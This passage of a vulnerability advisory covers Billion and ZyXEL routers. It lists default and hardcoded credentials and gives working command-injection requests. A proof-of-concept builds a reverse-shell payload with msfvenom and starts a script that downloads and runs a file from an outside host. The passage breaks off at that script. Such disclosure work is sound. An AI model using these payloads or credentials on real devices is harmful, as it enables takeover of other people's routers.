class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">7c082c75<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825265629131071-5\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825265629131071-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825265629131071-7\"><span class=\"crayon-v\">SaveTime<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiCurrentTime2<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiCurrentTime1<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">ToolsTimeSetFlag<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiRadioValue<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiClearPCSyncFlag<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiwPCdateMonth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825265629131071-8\"><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiwPCdateDay<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiwPCdateYear<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiwPCdateHour<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiwPCdateMinute<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiwPCdateSec<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiCurTime<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2FA<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">28NTP<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">connecting<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">29<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825265629131071-9\"><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiTimezoneType<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiViewSyncWith<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiPCdateMonth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiPCdateDay<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiPCdateYear<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiPCdateHour<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiPCdateMinute<\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825265629131071-10\"><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiPCdateSec<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiViewdateToolsTZ<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">GMT<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2B07<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3A00<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiViewdateDS<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Disable<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiViewSNTPServer<\/span><span class=\"crayon-o\">=<\/span>&#8220;<span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3b<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ping<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">127.0.0.1<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">23<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825265629131071-11\"><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">ntp2ServerFlag<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2FA<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">ntp3ServerFlag<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2FA<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0030 seconds] -->  <\/p>\n<p>This request will write the text, which is the command you want it to execute, to a file named <em>\/etc\/ntp.sh<\/em>:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825268688237577\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/userfs\/bin\/ntpclient -s -c 3 -l -h &#8220;&#8221;; ping -c 20 127.0.0.1 &amp;#&#8221; &amp;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825268688237577-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb825268688237577-1\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">userfs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ntpclient<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">l<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">h<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ping<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">127.0.0.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-p\">#&#8221; &amp;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<p>Which is then executed.<\/p>\n<p><strong>Default accounts &#8211; Billion 5200W-T router<\/strong><\/p>\n<ol>\n<li>username: admin; password: password<\/li>\n<li>username: true; password: true<\/li>\n<li>username: user3; password: 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678<\/li>\n<\/ol>\n<p><strong>Unauthenticated command execution vulnerability &#8211; P660HN-T v2<\/strong><br \/> The remote command vulnerability is composed from an authenticated command injection and a hardcoded supervisor password. The command injection vulnerability is in the <em>logSet.asp<\/em> file and the hardcoded supervisor password is &#8211; username: supervisor; password: zyad1234.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb82526a448123773\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/cgi-bin\/pages\/maintenance\/logSetting\/logSet.asp HTTP\/1.1  Content-Length: &#8230;    logSetting_H=1&amp;active=1&amp;logMode=LocalAndRemote&amp;serverIP=192.168.1.1`ping -c 3 1.1.1.1`%26%23&amp;serverPort=514<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb82526a448123773-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb82526a448123773-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb82526a448123773-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb82526a448123773-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb82526a448123773-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cgi<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pages<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">maintenance<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">logSetting<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">logSet<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">asp <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb82526a448123773-2\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb82526a448123773-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb82526a448123773-4\"><span class=\"crayon-v\">logSetting_H<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">active<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">logMode<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">LocalAndRemote<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">serverIP<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-v\">ping<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1.1.1.1<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">23<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">serverPort<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">514<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0012 seconds] -->  <\/p>\n<p>This will be written to <em>\/etc\/syslog.conf<\/em> file as:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb82526d797678401\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ServerIP=&#8221;192.168.1.1 `ping -c 3 1.1.1.1`&amp;#&#8221;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb82526d797678401-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb82526d797678401-1\"><span class=\"crayon-v\">ServerIP<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;192.168.1.1 `ping -c 3 1.1.1.1`&amp;#&#8221;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p>Which will then be executed by the syslog background process.<\/p>\n<p>The injection parameter is the <em>ServerIP<\/em>:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb82526f010375674\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ServerIP=1.1.1.1`&lt;command \/&gt;`&amp;#<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb82526f010375674-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb82526f010375674-1\"><span class=\"crayon-v\">ServerIP<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1.1.1.1<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-p\">#<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<p>The actual command that can be injected has a length limitation of 28 characters.<\/p>\n<p><u>Proof of Concept<\/u><br \/> To preform the attack, the following MSF command line should be used:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825271431242067\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> msfvenom -p linux\/mipsbe\/shell_reverse_tcp -f elf -o \/tmp\/shell-be.bin lhost=192.168.1.35 lport=4444<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825271431242067-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb825271431242067-1\"><span class=\"crayon-v\">msfvenom<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">linux<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">mipsbe<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">shell_reverse_tcp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">elf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">shell<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">be<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bin <\/span><span class=\"crayon-v\">lhost<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">192.168.1.35<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lport<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4444<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0015 seconds] -->  <\/p>\n<p>Which will serve the <em>\/tmp<\/em> directory through the <em>tftp<\/em> service.<\/p>\n<p>Authenticate to interface with <em>supervisor:zyad1234<\/em><\/p>\n<p>Write the following file <em>\/tmp\/a<\/em> by doing several injections (the injection accepts only 10 and 13 characters at a time).<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825274102328914\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/bin\/sh  wget -q -O \/tmp\/b http:\/\/10.13.37.1\/b  chmod +x 